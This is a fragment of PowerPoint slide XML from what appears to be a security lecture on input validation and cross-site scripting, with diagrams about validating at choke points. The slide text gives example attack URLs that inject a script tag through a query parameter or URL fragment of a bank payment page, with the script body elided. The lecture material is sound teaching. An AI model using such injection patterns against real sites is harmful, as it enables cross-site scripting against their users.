                </a:solidFill>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>be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done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client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-side, eg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>spotting Javascript inside a URL that a user clicks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800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>            http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bank.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pay.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=&lt;script&gt;.....&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> DOM-based XSS attacks, with URLs of the form  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     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GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bank.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pay.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=&lt;script&gt;.....&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>                                      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nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> malicious payload stays on the client-side,                                               so this can only be prevented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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8742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 bwMode="auto">
          <a:xfrm>
            <a:off x="5072063" y="3286125"/>
            <a:ext cx="2428875" cy="785813"/>
          </a:xfrm>
          <a:prstGeom prst="trapezoid">
            <a:avLst>
              <a:gd name="adj" fmla="val 124016"/>
            </a:avLst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8" name="Trapezoid 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5072063" y="2286000"/>
            <a:ext cx="2428875" cy="714375"/>
          </a:xfrm>
          <a:prstGeom prst="trapezoid">
            <a:avLst>
              <a:gd name="adj" fmla="val 137001"/>
            </a:avLst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rgbClr val="FFFF00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38244" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5072063" y="4071938"/>
            <a:ext cx="2357437" cy="91440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1382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D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>oing validation right: at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" i="1" dirty="0" smtClean="0"/>
              <a:t>choke points</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" i="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138264" name="Slide Number Placeholder 3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fld id="{D80A9371-C1C0-4B78-97E5-95D17491F7DD}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1400" smtClean="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F07040305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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F070403050403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285875" y="1500188"/>
            <a:ext cx="2000250" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="down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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2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43000" y="2214563"/>
            <a:ext cx="2357438" cy="278606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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="16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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="16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 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</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2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38248" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="3068638"/>
            <a:ext cx="573087" cy="288925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33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138249" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6072188" y="3000375"/>
            <a:ext cx="428625" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33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5357813" y="1571625"/>
            <a:ext cx="2000250" cy="500063"/>
          </a:xfrm>
          <a:prstGeom prst="down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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2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5463" y="2852738"/>
            <a:ext cx="1627240" cy="9510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choke point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for</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000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8252" name="Freeform 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5764213" y="2146300"/>
            <a:ext cx="523875" cy="3068638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 523461"/>
              <a:gd name="T1" fmla="*/ 0 h 2637183"/>
              <a:gd name="T2" fmla="*/ 134738 w 523461"/>
              <a:gd name="T3" fmla="*/ 10401317 h 2637183"/>
              <a:gd name="T4" fmla="*/ 444642 w 523461"/>
              <a:gd name="T5" fmla="*/ 18202322 h 2637183"/>
              <a:gd name="T6" fmla="*/ 485065 w 523461"/>
              <a:gd name="T7" fmla="*/ 33061328 h 2637183"/>
              <a:gd name="T8" fmla="*/ 161688 w 523461"/>
              <a:gd name="T9" fmla="*/ 54235394 h 2637183"/>
              <a:gd name="T10" fmla="*/ 390747 w 523461"/>
              <a:gd name="T11" fmla="*/ 73923670 h 26371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3461"/>
              <a:gd name="T19" fmla="*/ 0 h 2637183"/>
              <a:gd name="T20" fmla="*/ 523461 w 523461"/>
              <a:gd name="T21" fmla="*/ 2637183 h 26371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3461" h="2637183">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="29817" y="131417"/>
                  <a:pt x="59634" y="262835"/>
                  <a:pt x="132521" y="371061"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205408" y="479287"/>
                  <a:pt x="379895" y="514627"/>
                  <a:pt x="437321" y="649357"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="494747" y="784087"/>
                  <a:pt x="523461" y="965200"/>
                  <a:pt x="477078" y="1179444"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="430695" y="1393688"/>
                  <a:pt x="174487" y="1691862"/>
                  <a:pt x="159026" y="1934818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143565" y="2177774"/>
                  <a:pt x="263939" y="2407478"/>
                  <a:pt x="384313" y="2637183"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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38253" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2195513" y="3357563"/>
            <a:ext cx="500062" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33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138254" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1116013" y="4437063"/>
            <a:ext cx="500062" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33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138255" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2916238" y="2420938"/>
            <a:ext cx="500062" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33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138256" name="Freeform 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1474788" y="2106613"/>
            <a:ext cx="657225" cy="3035300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 422870 w 655983"/>
              <a:gd name="T1" fmla="*/ 0 h 3034747"/>
              <a:gd name="T2" fmla="*/ 643496 w 655983"/>
              <a:gd name="T3" fmla="*/ 478905 h 3034747"/>
              <a:gd name="T4" fmla="*/ 188452 w 655983"/>
              <a:gd name="T5" fmla="*/ 1064248 h 3034747"/>
              <a:gd name="T6" fmla="*/ 78139 w 655983"/>
              <a:gd name="T7" fmla="*/ 1862424 h 3034747"/>
              <a:gd name="T8" fmla="*/ 657285 w 655983"/>
              <a:gd name="T9" fmla="*/ 2274814 h 3034747"/>
              <a:gd name="T10" fmla="*/ 216031 w 655983"/>
              <a:gd name="T11" fmla="*/ 3046387 h 30347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5983"/>
              <a:gd name="T19" fmla="*/ 0 h 3034747"/>
              <a:gd name="T20" fmla="*/ 655983 w 655983"/>
              <a:gd name="T21" fmla="*/ 3034747 h 30347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5983" h="3034747">
                <a:moveTo>
                  <a:pt x="406401" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="531192" y="150191"/>
                  <a:pt x="655983" y="300382"/>
                  <a:pt x="618435" y="477078"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="580887" y="653774"/>
                  <a:pt x="271671" y="830470"/>
                  <a:pt x="181114" y="1060174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90558" y="1289878"/>
                  <a:pt x="0" y="1654313"/>
                  <a:pt x="75096" y="1855304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="150192" y="2056295"/>
                  <a:pt x="609601" y="2069547"/>
                  <a:pt x="631688" y="2266121"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="653775" y="2462695"/>
                  <a:pt x="430696" y="2748721"/>
                  <a:pt x="207618" y="3034747"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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38257" name="Freeform 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2428875" y="2071688"/>
            <a:ext cx="357188" cy="3035300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1 w 655983"/>
              <a:gd name="T1" fmla="*/ 0 h 3034747"/>
              <a:gd name="T2" fmla="*/ 1 w 655983"/>
              <a:gd name="T3" fmla="*/ 478905 h 3034747"/>
              <a:gd name="T4" fmla="*/ 1 w 655983"/>
              <a:gd name="T5" fmla="*/ 1064248 h 3034747"/>
              <a:gd name="T6" fmla="*/ 1 w 655983"/>
              <a:gd name="T7" fmla="*/ 1862424 h 3034747"/>
              <a:gd name="T8" fmla="*/ 1 w 655983"/>
              <a:gd name="T9" fmla="*/ 2274814 h 3034747"/>
              <a:gd name="T10" fmla="*/ 1 w 655983"/>
              <a:gd name="T11" fmla="*/ 3046387 h 30347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5983"/>
              <a:gd name="T19" fmla="*/ 0 h 3034747"/>
              <a:gd name="T20" fmla="*/ 655983 w 655983"/>
              <a:gd name="T21" fmla="*/ 3034747 h 30347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5983" h="3034747">
                <a:moveTo>
                  <a:pt x="406401" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="531192" y="150191"/>
                  <a:pt x="655983" y="300382"/>
                  <a:pt x="618435" y="477078"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="580887" y="653774"/>
                  <a:pt x="271671" y="830470"/>
                  <a:pt x="181114" y="1060174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90558" y="1289878"/>
                  <a:pt x="0" y="1654313"/>
                  <a:pt x="75096" y="1855304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="150192" y="2056295"/>
                  <a:pt x="609601" y="2069547"/>
                  <a:pt x="631688" y="2266121"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="653775" y="2462695"/>
                  <a:pt x="430696" y="2748721"/>
                  <a:pt x="207618" y="3034747"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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3125" y="5214938"/>
            <a:ext cx="1458989" cy="378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data flows</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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1875" y="2786063"/>
            <a:ext cx="1388329" cy="1237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 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validation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all over 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place</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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8260" name="Freeform 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6072188" y="2214563"/>
            <a:ext cx="655637" cy="3035300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 401924 w 655983"/>
              <a:gd name="T1" fmla="*/ 0 h 3034747"/>
              <a:gd name="T2" fmla="*/ 611622 w 655983"/>
              <a:gd name="T3" fmla="*/ 478905 h 3034747"/>
              <a:gd name="T4" fmla="*/ 179118 w 655983"/>
              <a:gd name="T5" fmla="*/ 1064248 h 3034747"/>
              <a:gd name="T6" fmla="*/ 74271 w 655983"/>
              <a:gd name="T7" fmla="*/ 1862424 h 3034747"/>
              <a:gd name="T8" fmla="*/ 624728 w 655983"/>
              <a:gd name="T9" fmla="*/ 2274814 h 3034747"/>
              <a:gd name="T10" fmla="*/ 205331 w 655983"/>
              <a:gd name="T11" fmla="*/ 3046387 h 30347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5983"/>
              <a:gd name="T19" fmla="*/ 0 h 3034747"/>
              <a:gd name="T20" fmla="*/ 655983 w 655983"/>
              <a:gd name="T21" fmla="*/ 3034747 h 30347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5983" h="3034747">
                <a:moveTo>
                  <a:pt x="406401" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="531192" y="150191"/>
                  <a:pt x="655983" y="300382"/>
                  <a:pt x="618435" y="477078"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="580887" y="653774"/>
                  <a:pt x="271671" y="830470"/>
                  <a:pt x="181114" y="1060174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90558" y="1289878"/>
                  <a:pt x="0" y="1654313"/>
                  <a:pt x="75096" y="1855304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="150192" y="2056295"/>
                  <a:pt x="609601" y="2069547"/>
                  <a:pt x="631688" y="2266121"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="653775" y="2462695"/>
                  <a:pt x="430696" y="2748721"/>
                  <a:pt x="207618" y="3034747"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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38261" name="Freeform 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214438" y="2071688"/>
            <a:ext cx="2178050" cy="3017837"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 3320298 w 2122556"/>
              <a:gd name="T1" fmla="*/ 0 h 2849217"/>
              <a:gd name="T2" fmla="*/ 3180006 w 2122556"/>
              <a:gd name="T3" fmla="*/ 2488464 h 2849217"/>
              <a:gd name="T4" fmla="*/ 1753685 w 2122556"/>
              <a:gd name="T5" fmla="*/ 3286652 h 2849217"/>
              <a:gd name="T6" fmla="*/ 818383 w 2122556"/>
              <a:gd name="T7" fmla="*/ 2018945 h 2849217"/>
              <a:gd name="T8" fmla="*/ 280588 w 2122556"/>
              <a:gd name="T9" fmla="*/ 4084843 h 2849217"/>
              <a:gd name="T10" fmla="*/ 350735 w 2122556"/>
              <a:gd name="T11" fmla="*/ 6385488 h 2849217"/>
              <a:gd name="T12" fmla="*/ 1356184 w 2122556"/>
              <a:gd name="T13" fmla="*/ 6291582 h 2849217"/>
              <a:gd name="T14" fmla="*/ 3016331 w 2122556"/>
              <a:gd name="T15" fmla="*/ 5915965 h 2849217"/>
              <a:gd name="T16" fmla="*/ 3671035 w 2122556"/>
              <a:gd name="T17" fmla="*/ 6855011 h 2849217"/>
              <a:gd name="T18" fmla="*/ 2572067 w 2122556"/>
              <a:gd name="T19" fmla="*/ 7981856 h 2849217"/>
              <a:gd name="T20" fmla="*/ 1823828 w 2122556"/>
              <a:gd name="T21" fmla="*/ 9108714 h 2849217"/>
              <a:gd name="T22" fmla="*/ 748236 w 2122556"/>
              <a:gd name="T23" fmla="*/ 9719080 h 2849217"/>
              <a:gd name="T24" fmla="*/ 280588 w 2122556"/>
              <a:gd name="T25" fmla="*/ 9531268 h 2849217"/>
              <a:gd name="T26" fmla="*/ 46766 w 2122556"/>
              <a:gd name="T27" fmla="*/ 7559285 h 2849217"/>
              <a:gd name="T28" fmla="*/ 561178 w 2122556"/>
              <a:gd name="T29" fmla="*/ 6948917 h 2849217"/>
              <a:gd name="T30" fmla="*/ 1519854 w 2122556"/>
              <a:gd name="T31" fmla="*/ 6948917 h 2849217"/>
              <a:gd name="T32" fmla="*/ 2034271 w 2122556"/>
              <a:gd name="T33" fmla="*/ 8216620 h 2849217"/>
              <a:gd name="T34" fmla="*/ 3016331 w 2122556"/>
              <a:gd name="T35" fmla="*/ 10094690 h 28492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122556"/>
              <a:gd name="T55" fmla="*/ 0 h 2849217"/>
              <a:gd name="T56" fmla="*/ 2122556 w 2122556"/>
              <a:gd name="T57" fmla="*/ 2849217 h 28492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22556" h="2849217">
                <a:moveTo>
                  <a:pt x="1881808" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1916042" y="273878"/>
                  <a:pt x="1950277" y="547756"/>
                  <a:pt x="1802295" y="702365"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1654313" y="856974"/>
                  <a:pt x="1216991" y="949739"/>
                  <a:pt x="993913" y="927652"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="770835" y="905565"/>
                  <a:pt x="602974" y="532295"/>
                  <a:pt x="463826" y="569843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="324678" y="607391"/>
                  <a:pt x="203200" y="947530"/>
                  <a:pt x="159026" y="1152939"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114852" y="1358348"/>
                  <a:pt x="97182" y="1698487"/>
                  <a:pt x="198782" y="1802296"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="300382" y="1906105"/>
                  <a:pt x="516835" y="1797878"/>
                  <a:pt x="768626" y="1775791"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1020417" y="1753704"/>
                  <a:pt x="1490869" y="1643270"/>
                  <a:pt x="1709530" y="1669774"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1928191" y="1696278"/>
                  <a:pt x="2122556" y="1837634"/>
                  <a:pt x="2080591" y="1934817"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2038626" y="2032000"/>
                  <a:pt x="1632226" y="2146853"/>
                  <a:pt x="1457739" y="2252870"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1283252" y="2358887"/>
                  <a:pt x="1205947" y="2489200"/>
                  <a:pt x="1033669" y="2570922"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="861391" y="2652644"/>
                  <a:pt x="569843" y="2723322"/>
                  <a:pt x="424069" y="2743200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="278295" y="2763078"/>
                  <a:pt x="225287" y="2791791"/>
                  <a:pt x="159026" y="2690191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92765" y="2588591"/>
                  <a:pt x="0" y="2255078"/>
                  <a:pt x="26504" y="2133600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53008" y="2012122"/>
                  <a:pt x="178904" y="1990035"/>
                  <a:pt x="318052" y="1961322"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="1932609"/>
                  <a:pt x="722243" y="1901687"/>
                  <a:pt x="861391" y="1961322"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1000539" y="2020957"/>
                  <a:pt x="1011583" y="2171148"/>
                  <a:pt x="1152939" y="2319130"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1294295" y="2467112"/>
                  <a:pt x="1557130" y="2729947"/>
                  <a:pt x="1709530" y="2849217"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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38262" name="TextBox 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="2428875"/>
            <a:ext cx="457176" cy="249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p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r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o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g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r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a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m</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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8263" name="Freeform 60"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5287963" y="2200275"/>
            <a:ext cx="1941512" cy="2968625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1941444"/>
              <a:gd name="T1" fmla="*/ 0 h 2968487"/>
              <a:gd name="T2" fmla="*/ 318284 w 1941444"/>
              <a:gd name="T3" fmla="*/ 331627 h 2968487"/>
              <a:gd name="T4" fmla="*/ 517213 w 1941444"/>
              <a:gd name="T5" fmla="*/ 464288 h 2968487"/>
              <a:gd name="T6" fmla="*/ 915072 w 1941444"/>
              <a:gd name="T7" fmla="*/ 225505 h 2968487"/>
              <a:gd name="T8" fmla="*/ 1127262 w 1941444"/>
              <a:gd name="T9" fmla="*/ 477540 h 2968487"/>
              <a:gd name="T10" fmla="*/ 1511861 w 1941444"/>
              <a:gd name="T11" fmla="*/ 172446 h 2968487"/>
              <a:gd name="T12" fmla="*/ 1790367 w 1941444"/>
              <a:gd name="T13" fmla="*/ 185719 h 2968487"/>
              <a:gd name="T14" fmla="*/ 1710791 w 1941444"/>
